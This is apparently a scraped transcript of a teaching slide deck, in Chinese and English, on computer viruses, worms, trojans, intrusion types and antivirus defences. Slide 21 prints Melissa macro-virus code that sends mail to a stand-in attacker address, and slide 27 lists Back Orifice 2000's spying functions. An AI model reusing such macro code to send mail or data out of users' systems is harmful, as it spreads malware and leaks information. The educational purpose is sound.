1 / 34

電腦病毒與入侵

電腦病毒與入侵. 電腦病毒介紹 駭客入侵種類與名詞解釋 入侵偵測系統. Viruses and Other Malicious Content. computer viruses have got a lot of publicity one of a family of malicious software effects usually obvious have figured in news reports, fiction, movies (often exaggerated) getting more attention than deserve

giulio
Télécharger la présentation

電腦病毒與入侵

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. 電腦病毒與入侵 • 電腦病毒介紹 • 駭客入侵種類與名詞解釋 • 入侵偵測系統

  2. Viruses and Other Malicious Content • computer viruses have got a lot of publicity • one of a family of malicious software • effects usually obvious • have figured in news reports, fiction, movies (often exaggerated) • getting more attention than deserve • are a concern though

  3. Malicious Software

  4. Trapdoors • secret entry point into a program • allows those who know access bypassing usual security procedures • have been commonly used by developers • a threat when left in production programs allowing exploited by attackers • very hard to block in O/S • requires good s/w development & update

  5. Logic Bomb • one of oldest types of malicious software • code embedded in legitimate program • activated when specified conditions met • eg presence/absence of some file • particular date/time • particular user • when triggered typically damage system • modify/delete files/disks

  6. Trojan Horse • program with hidden side-effects • which is usually superficially attractive • eg game, s/w upgrade etc • when run performs some additional tasks • allows attacker to indirectly gain access they do not have directly • often used to propagate a virus/worm or install a backdoor • or simply to destroy data

  7. Zombie • program which secretly takes over another networked computer • then uses it to indirectly launch attacks • often used to launch distributed denial of service (DDoS) attacks • exploits known flaws in network systems

  8. Viruses • a piece of self-replicating code attached to some other code • cf biological virus • both propagates itself & carries a payload • carries code to make copies of itself • as well as code to perform some covert task

  9. 惡性程式比較表

  10. 何謂電腦病毒 • 一 隻 特殊的電腦程式 • 自我複製  潛伏發作 • 病毒濫觴︰巴基斯坦兄弟的自立救濟 • 病毒、網際網路蟲毒、特落依木馬、後門

  11. 感染途徑 • 磁片、CD片 • 網路 • BBS • FTP • E-Mail • 網路芳鄰

  12. 病毒種類-1 • 開機型︰潛伏於磁碟啟動區中 • e.g.米開朗基羅﹐3/6發作﹐Format硬碟 • e.g.Monkey病毒﹐破壞硬碟的分割區 • 檔案型︰潛伏於執行檔中 • e.g. Friday the 13th﹐十三號星期五發作﹐刪除硬碟中所有的執行檔 • e.g.吃角子老虎﹐1,4,8月的15日發作﹐有五次下注機會﹐以還原硬碟中的資料

  13. 病毒種類-2 • 巨集型︰以Office的巨集撰寫而成 • e.g.台灣No.1﹐13日發作﹐猜拳﹐開20份空白文件 • e.g.阿扁病毒﹐﹐。有夢最美﹐希望相隨 • 混合型︰兼具開機與檔案型 • 網路病毒︰利用網路再傳播 • e.g. 梅莉莎(沒力殺?)病毒

  14. 防毒-1 • 不使用盜版軟體或來路不明軟體 • 關閉/設定Word的巨集安全 • 關閉網路共享資源 • 設定從硬碟開機﹐以避免感染開機型病毒/BIOS可以設定Virus防護 • 安裝防毒軟體﹐並定期更新病毒碼或利用防毒公司的push technology

  15. 防毒-2 • 準備一張急用開機片﹐可在中毒時急救 • 磁片平時應設為防寫狀態 • 從網路下載執行檔、電子郵件之附件檔請特別處理 • 備份!!備份!!備份!!

  16. 視窗系統的執行檔種類 • 二位元檔 (.exe和.com) • 批次檔 (.bat) • VBScript 檔 (.vbs) • JAR檔 (.jar)

  17. 中毒處理 • 立即關機 • 以乾淨之開機片重新開機 • 掃描、隔離、解毒 • 檢查其他磁片

  18. Worms • replicating but not infecting program • typically spreads over a network • cf Morris Internet Worm in 1988 • led to creation of CERTs • using users distributed privileges or by exploiting system vulnerabilities • widely used by hackers to create zombie PC's, subsequently used for further attacks, esp DoS • major issue is lack of security of permanently connected systems, esp PC's

  19. Worm Operation • worm phases like those of viruses: • dormant • propagation • search for other systems to infect • establish connection to target remote system • replicate self onto remote system • triggering • execution

  20. Recent Worm Attacks • new spate of attacks from mid-2001 • Code Red • exploited bug in MS IIS to penetrate & spread • probes random IPs for systems running IIS • had trigger time for denial-of-service attack • 2nd wave infected 360000 servers in 14 hours • Code Red 2 • had backdoor installed to allow remote control • Nimda • used multiple infection mechanisms • email, shares, web client, IIS, Code Red 2 backdoor

  21. 網路病毒案例- 梅莉莎 • 電子郵件的標題取為“An important message from <傳送者名稱>”, 而訊息的主體是“Here is that document you asked for …don’t show anyone else;-).” • 原始碼: Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) BreakUmOffASlice.Recipients.Add attacker@example.com BreakUmOffASlice.Subject = "Important Message From " & Application.CurrentUser BreakUmOffASlice.Send DasMapiName.Logoff

  22. 網路病毒案例 - Nimda • 傳遞途徑 • 電子郵件 • 網路芳鄰 • 網站 • Reference: www.symantec.com

  23. 網路病毒案例 – I Love You • 標題:I LOVEYOU, 附加檔:LOVE-LETTER-FOR-YOU.txt.vbs • 感染:*.mp3, *.vbs, *.jpg, *.jpeg, *.hta, *.vbe… 改成*.vbs • What’s VBS: msgbox "Click OK to reformat hard drive."

  24. 駭客入侵種類 -1

  25. Buffer Overflows 例子 • 如果您在安裝 Red Hat Linux 之初, 便已選好 NFS Server 項目,原則上, rpc.mountd 和 rpc.nfsd 這兩個重要的 daemon 都會隨 Linux 而自動啟動, 您大概只需要編輯 /etc/exports 檔案, 便可透過 NFS 方式將檔案資源分享出來。 入侵者可以透過這些版本 mountd 中存在的 buffer overflow 漏洞,來取得管理者的權限。只要mountd 這個 程式正在執行,不論有沒有分享(export)檔案,皆可能被入侵。目前確認存 在此一漏洞的系統有: 所有版本的 Red Hat Linux。

  26. 駭客入侵種類 -2

  27. 特洛伊木馬Back Orifice 2000 • 讓受害機器重新開機。 • 鎖住受害機器。 • 從密碼緩衝區攫取所有的網路密碼。 • 得到機器的資訊, 例如處理器的速度、記憶體及磁碟的空間。 • 錄下使用者在機器上所敲打的任何按鍵, 並隨時檢視它們。 • 顯示系統訊息視窗。 • 將系統埠重新轉向到其它的IP位址和通訊埠。 • 新增或刪除微軟網路的共享資源。 • 對應或取消資源與網路的對應。 • 啟動、刪除、以及列出系統的程序, 包括關閉使用者正在執行的程式。 • 編輯與檢視使用者登錄的完整權利。 • 在受害機器上播放挑選的聲音檔。 • 擷取使用者的電腦畫面。 • 列出機器上是否裝有任何的影像抓取設備, 例如數位照相機;如果有, 駭客就可以利用它來擷取動畫或固定的影像。這將允許駭客直接監視受害者的房間。 • 對使用者硬碟完整的存取與編輯的權利。 • 關閉這個伺服器, 以及將它自己完全從系統中移除。

  28. 駭客入侵種類 -3

  29. 行動程式碼安全 • 巨集語言 VBA • JavaScript • VBScript • Java Applet • ActiveX 控制項

  30. VBScript 受限的動作 • 檔案I/O • 動態資料交換 (Dynamic Data Exchange, DDE) • 物件的產生 (Object Instantiation) • 直接資料庫存取 (Direct Database Access, DAO) • 執行DDL

  31. Virus Countermeasures • viral attacks exploit lack of integrity control on systems • to defend need to add such controls • typically by one or more of: • prevention - block virus infection mechanism • detection - of viruses in infected system • reaction - restoring system to clean state

  32. Anti-Virus Software • first-generation • scanner uses virus signature to identify virus • or change in length of programs • second-generation • uses heuristic rules to spot viral infection • or uses program checksums to spot changes • third-generation • memory-resident programs identify virus by actions • fourth-generation • packages with a variety of antivirus techniques • eg scanning & activity traps, access-controls

  33. Advanced Anti-Virus Techniques • generic decryption • use CPU simulator to check program signature & behavior before actually running it • digital immune system (IBM) • general purpose emulation & virus detection • any virus entering org is captured, analyzed, detection/shielding created for it, removed

  34. Behavior-Blocking Software • integrated with host O/S • monitors program behavior in real-time • eg file access, disk format, executable mods, system settings changes, network access • for possibly malicious actions • if detected can block, terminate, or seek ok • has advantage over scanners • but malicious code runs before detection

More Related